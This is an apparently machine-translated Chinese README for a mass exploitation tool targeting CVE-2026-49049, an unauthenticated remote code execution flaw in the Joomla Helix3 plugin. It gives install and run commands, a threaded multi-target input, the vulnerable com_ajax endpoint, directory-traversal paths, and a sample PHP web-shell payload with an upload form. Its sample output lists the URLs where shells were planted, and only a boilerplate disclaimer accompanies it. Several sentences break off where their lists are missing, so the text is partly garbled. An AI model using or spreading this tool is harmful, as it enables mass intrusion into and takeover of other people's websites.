针对 CVE-2026-49049 的批量漏洞扫描器 - Joomla Helix3 框架中的未授权远程代码执行漏洞。
该工具用于检查多个 Joomla 站点是否存在 Helix3 插件中的 CVE-2026-49049 漏洞。该漏洞允许未授权攻击者在目标服务器上上传并执行任意 PHP 代码。
扫描器尝试执行以下操作:
com_ajax 端点与 helix3 插件进行攻击。requests 库pip install requests
🛠 安装
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 使用方法
python2 cve-2026-49049.py targets.txt
输入格式
targets.txt 中的每一行应包含一个域名或 IP:
example.com
https://example.com
http://192.168.1.100
输出文件
文件 描述 results.txt 载荷已执行的漏洞 URL rez.txt 载荷已上传但未执行的 URL(原始 PHP)
示例输出
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ 配置
您可以在脚本中调整以下变量:
变量 默认值 描述 THREADS 20 并发线程数 PATHS ['../../../', '../../../../'] 目录遍历路径 TIMEOUT 5 HTTP 请求超时时间 RESULT_FILE 'results.txt' 漏洞站点的输出文件 RAW_RESULT_FILE 'rez.txt' 原始 PHP 站点的输出文件
🧠 工作原理
该脚本向以下地址发送 POST 请求:
/index.php?option=com_ajax&plugin=helix3&format=json
载荷会执行以下操作:
随后,脚本会检查该文件是否可访问,以及其中的 PHP 代码是被执行还是仅以纯文本形式显示。
载荷示例
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ 免责声明
本工具仅用于教育和授权测试目的。
未经授权,将本工具用于您不拥有或未经明确许可测试的系统属于违法行为。作者不对因使用本工具造成的任何误用或损害负责。
更多免责声明:您可以在 Jenderal92 的封面上查看免责声明。您可以点击此处 !!!查看。